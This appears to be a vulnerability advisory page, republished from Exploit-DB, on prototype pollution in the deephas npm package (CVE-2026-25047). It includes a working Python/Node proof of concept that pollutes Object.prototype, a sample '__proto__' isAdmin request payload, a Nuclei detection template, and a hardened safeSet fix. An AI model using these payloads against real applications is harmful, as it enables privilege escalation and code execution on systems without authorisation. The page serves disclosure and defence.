[webapps] deephas 1.0.7 - Prototype Pollution

CVE-2026-25047

deephas 1.0.7 (and earlier) contains a prototype pollution vulnerability: a crafted property path passed to the package's `set()` function writes to `Object.prototype`, so the injected property is inherited by every object in the process.

Critical · CVSS 9.8

📋 Basic vulnerability information

CVE: CVE-2026-25047
Vulnerability type: Prototype pollution
Affected versions: deephas 1.0.7 and below (fixed in 1.0.8)
Severity: Critical · CVSS 9.8
Published: 2026-04-30
Submitter: Mohammed Idrees Banyamer
Source: Exploit-DB (original post)

🔬 Root cause

`deephas.set()` walks a dotted property path and assigns into the target recursively, but it does not adequately exclude the reserved keys `__proto__`, `constructor` and `prototype`. A path such as `constructor.prototype.x` or `__proto__.x` therefore resolves to `Object.prototype`, and the final assignment lands on the shared prototype rather than on the caller's object, polluting every object that inherits from it. The package does carry two guards, a `hasOwnProperty` check and a string check based on `indexOf`; the published PoC defeats them by overriding `Object.prototype.hasOwnProperty` and `String.prototype.indexOf` in the same Node process before calling `set()`, which shows which built-ins the guards depend on but is not, by itself, a bypass reachable from untrusted input.

🎯 Attack scenario

1. The attacker sends an HTTP request (for example a JSON body or query parameters) whose keys include `__proto__` or `constructor.prototype`.
2. Server-side code processes that input with a deep merge, assignment or copy operation (here, `deephas.set()` with a path derived from the request) without filtering the reserved keys.
3. The attacker's value is written to `Object.prototype`, so every object in the process now inherits the property.
4. Later application logic that reads an object property without checking that it is the object's own property (for instance an `isAdmin` flag, a template option or a child-process option) sees the attacker's value, which can bypass security checks or, depending on the consumer, lead to code execution.

Success indicator: the server misbehaves, or code controlled by the attacker runs.

💥 Impact

Depending on how the polluted properties are consumed by the application and its dependencies, an attacker can use prototype pollution for remote code execution, privilege escalation, authentication bypass, tampering with application logic, or denial of service.

⚔️ Original PoC

The original PoC is a local Python harness that runs two Node.js snippets against `deephas@1.0.7`. Each snippet first overrides a built-in (`Object.prototype.hasOwnProperty` in the first, `String.prototype.indexOf` in the second), then calls `has.set(obj, 'constructor.prototype.poc1', 'yes!!!')` or `has.set(obj, '__proto__.poc2', 'HACKED')` and prints whether a fresh `{}` now inherits the property. If it does, `Object.prototype` has been polluted. In a real application the same effect would come from a request-controlled key such as `{"__proto__": {"isAdmin": true}}` reaching an unfiltered deep set or merge, which is what would turn an ordinary user into an administrator.

# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# CVSS: 9.8 (Critical)
#
# Description:
# The 'deephas' npm package suffers from a prototype pollution vulnerability
# in versions 1.0.7 and below due to unsafe recursive property assignment
# without proper hasOwnProperty checks and inadequate path sanitization.
#
# An attacker who can supply arbitrary keys to deephas.set() can pollute
# Object.prototype, which may lead to:
# • Remote code execution (when polluting sensitive properties like
#   process.env, require.extensions, child_process, etc.)
# • Denial of Service
# • Security bypass (when polluting hasOwnProperty, toString, etc.)
# • Privilege escalation in sandboxed / vm2-like environments
#
# This PoC demonstrates pollution of Object.prototype via two techniques:
# 1. constructor.prototype path + hasOwnProperty bypass
# 2. __proto__ path + indexOf bypass
#
# • https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27
# • https://nvd.nist.gov/vuln/detail/CVE-2026-25047
#
# Usage:
# 1. npm install deephas@1.0.7
# 2. python3 poc-deephas-prototype-pollution.py
#
# Remediation:
# Upgrade to deephas >= 1.0.8
#
import os
import shutil
import subprocess
import sys
import textwrap


def run_js(code: str) -> tuple[bool, str, str]:
    """Write a JavaScript snippet to a temp file next to node_modules, run it
    with Node.js and return (exited_cleanly, stdout, stderr)."""
    tmp_file = "poc-deephas-temp.js"
    try:
        with open(tmp_file, "w", encoding="utf-8") as f:
            f.write(code.strip())
        result = subprocess.run(
            ["node", tmp_file],
            capture_output=True,
            text=True,
            timeout=10,
            check=False,
        )
        return (
            result.returncode == 0,
            result.stdout.strip(),
            result.stderr.strip(),
        )
    except FileNotFoundError:
        return False, "", "Node.js not found. Please install Node.js."
    except subprocess.TimeoutExpired:
        return False, "", "Execution timed out."
    except Exception as e:
        return False, "", f"Error: {e}"
    finally:
        if os.path.exists(tmp_file):
            try:
                os.remove(tmp_file)
            except OSError:
                pass


def show_result(name: str, success: bool, stdout: str, stderr: str):
    """Print one PoC's outcome; the markers written by the JS snippets
    ('yes!!!' / 'HACKED') are the evidence of pollution."""
    print(f"{'─' * 10} {name} {'─' * 10}")
    if not success:
        print("STATUS : FAILED")
        if stderr:
            print("ERROR :", stderr.splitlines()[0] if stderr.splitlines() else stderr)
        else:
            print("(no error message captured)")
    else:
        polluted = any(x in stdout.lower() for x in ["yes!!!", "hacked", "polluted"])
        status = "VULNERABLE (pollution successful)" if polluted else "UNEXPECTED RESULT"
        print(f"STATUS : {status}")
        print()
        for line in stdout.splitlines():
            print(f"  {line}")
    print("─" * 70)
    print()


def main():
    print("=" * 70)
    print("  deephas <= 1.0.7 – Prototype Pollution PoC")
    print("  CVE-2026-25047 / GHSA-2733-6c58-pf27")
    print("=" * 70)
    print()
    if not shutil.which("node"):
        print("Error: Node.js is required but not found in PATH.")
        sys.exit(1)
    print("[*] Make sure you have installed the vulnerable version:")
    print("    npm install deephas@1.0.7\n")

    # ── PoC 1: constructor.prototype + hasOwnProperty bypass ───────
    # The override runs in the same process as the call: it disables the
    # hasOwnProperty guard deephas relies on before set() is invoked.
    poc1 = textwrap.dedent("""\
        Object.prototype.hasOwnProperty = () => true;
        const has = require('deephas');
        const obj = {};
        has.set(obj, 'constructor.prototype.poc1', 'yes!!!');
        console.log('obj.poc1 →', obj.poc1);
        console.log('{}.poc1 →', {}.poc1);
        console.log('polluted global? →', {}.poc1 === 'yes!!!');
    """)
    ok1, out1, err1 = run_js(poc1)
    show_result("PoC 1 – constructor.prototype pollution", ok1, out1, err1)

    # ── PoC 2: __proto__ + indexOf bypass ──────────────────────────
    # Same idea: neutralise the indexOf-based '__proto__' string check
    # before deephas inspects the path.
    poc2 = textwrap.dedent("""\
        String.prototype.indexOf = () => -1;
        const has = require('deephas');
        const obj = {};
        has.set(obj, '__proto__.poc2', 'HACKED');
        console.log('obj.poc2 →', obj.poc2);
        console.log('{}.poc2 →', {}.poc2);
        console.log('polluted global? →', {}.poc2 === 'HACKED');
    """)
    ok2, out2, err2 = run_js(poc2)
    show_result("PoC 2 – __proto__ + indexOf bypass", ok2, out2, err2)

    print(" " * 20 + "SUMMARY".center(30, "─"))
    print("If you see 'yes!!!' or 'HACKED' printed from {}.xxx property")
    print("→ deephas@1.0.7 is VULNERABLE to prototype pollution.")
    print()
    print("Fix: Upgrade to deephas >= 1.0.8")
    print("=" * 70)


if __name__ == "__main__":
    main()

🔍 Nuclei detection template

The following template is a fingerprinting aid, not an exploit check: it only fires when a target exposes a `package.json` over HTTP (the app's own manifest, or the one under `node_modules/deephas/`) that names a vulnerable deephas version. A dependency range such as `^1.0.7` does not prove which version is installed, and an application that never passes request-controlled paths to `set()` is not exploitable even if the version matches, so a hit should be confirmed by inspecting the code or by a behavioural test:

id: CVE-2026-25047-detection

info:
  name: deephas <= 1.0.7 - Prototype Pollution Detection
  author: banyamer_security
  severity: critical
  description: |
    The 'deephas' npm package suffers from a prototype pollution vulnerability
    in versions 1.0.7 and below due to unsafe recursive property assignment
    without proper hasOwnProperty checks and inadequate path sanitization.
    This template only fingerprints an exposed package manifest; it does not
    exercise the vulnerable code path.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25047
    - https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27
  classification:
    cvss-score: 9.8
  tags: cve,cve2026,prototype-pollution,deephas,nodejs

http:
  - method: GET
    path:
      - "{{BaseURL}}/node_modules/deephas/package.json"
      - "{{BaseURL}}/package.json"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      # The package's own manifest: the name and a vulnerable version must both match,
      # otherwise any unrelated package.json with a 1.0.x version would be flagged.
      - type: regex
        regex:
          - '"name":\s*"deephas"'
          - '"version":\s*"1\.0\.[0-7]"'
        condition: and

      # The application's manifest: a dependency pinned or ranged on a vulnerable version.
      - type: regex
        regex:
          - '"deephas":\s*"[~^]?1\.0\.[0-7]"'

    extractors:
      - type: regex
        name: version
        regex:
          - '"version":\s*"([^"]+)"'
        group: 1

🛡️ Remediation

Upgrade to deephas 1.0.8 or later. Until that is possible: strictly reject the keys `__proto__`, `constructor` and `prototype` in any user-controlled path or object before it reaches a deep set, merge or copy; prefer a deep-merge implementation that is hardened against prototype pollution; and, as defence in depth, consider freezing `Object.prototype` at startup (`Object.freeze(Object.prototype)`) or running Node with `--disable-proto=delete`, which removes the `__proto__` accessor entirely (note that neither of these blocks the `constructor.prototype` route, so key filtering is still required).
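To make the root cause and the remediation concrete, the following added example (not deephas's own code, and not part of the original post) reimplements the vulnerable pattern as `unsafeSet()` next to a hardened `safeSet()`. The hardened version rejects the reserved keys by `Set` membership and only descends through own properties via `Object.hasOwn` (ES2022, Node 16.9+), so it is unaffected by the PoC's trick of overriding `String.prototype.indexOf` or `Object.prototype.hasOwnProperty`. The marker names are arbitrary.

```javascript
'use strict';

// Keys that would redirect a dotted path onto Object.prototype.
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable pattern (same bug class as deephas <= 1.0.7): walk the path,
// create missing levels, assign at the end. 'constructor.prototype.x' and
// '__proto__.x' both resolve to Object.prototype and pollute it.
function unsafeSet(target, path, value) {
  const keys = path.split('.');
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    if (node[key] === undefined) node[key] = {};
    node = node[key]; // inherited 'constructor' / '__proto__' are followed too
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Hardened version.
function safeSet(target, path, value) {
  if (typeof path !== 'string' || path.length === 0) {
    throw new TypeError('path must be a non-empty string');
  }
  const keys = path.split('.');
  // Set membership does not go through String.prototype.indexOf, so the
  // PoC's indexOf override has no effect on this check.
  for (const key of keys) {
    if (DANGEROUS_KEYS.has(key)) {
      throw new Error(`refusing to set reserved key "${key}"`);
    }
  }
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    // Only descend into an own, non-null object property. Anything inherited
    // (e.g. 'toString') is shadowed with a fresh own object instead of being
    // written through to the prototype. Object.hasOwn is a static method and
    // is not touched by overriding Object.prototype.hasOwnProperty.
    if (!Object.hasOwn(node, key) || typeof node[key] !== 'object' || node[key] === null) {
      node[key] = {};
    }
    node = node[key];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// True if fn throws; used to check that safeSet refuses a path.
function rejects(fn) {
  try {
    fn();
    return false;
  } catch (e) {
    return true;
  }
}

// Stand-alone demonstration; cleans up the pollution it causes.
const MARKER = 'pp_demo_marker'; // arbitrary marker property name
unsafeSet({}, '__proto__.' + MARKER, 'polluted');
console.log('after unsafeSet, ({}).' + MARKER + ' =', ({})[MARKER]);
delete Object.prototype[MARKER];
console.log('safeSet rejects __proto__ path:',
  rejects(() => safeSet({}, '__proto__.' + MARKER, 'x')));
console.log('safeSet rejects constructor.prototype path:',
  rejects(() => safeSet({}, 'constructor.prototype.' + MARKER, 'x')));
console.log('({}).' + MARKER + ' after safeSet attempts =', ({})[MARKER]);
console.log('normal nested set:', JSON.stringify(safeSet({}, 'a.b.c', 42)));
```

Run it with `node safe-set-example.js` (any file name). The own-property check matters beyond the three reserved keys: a path like `toString.x` on the unsafe setter would write into the inherited `Object.prototype.toString` function object, whereas the hardened setter creates an own `toString` object on the target and leaves the prototype untouched.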

📎 References

- https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27
- https://nvd.nist.gov/vuln/detail/CVE-2026-25047

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 05:29 | Source: Exploit-DB
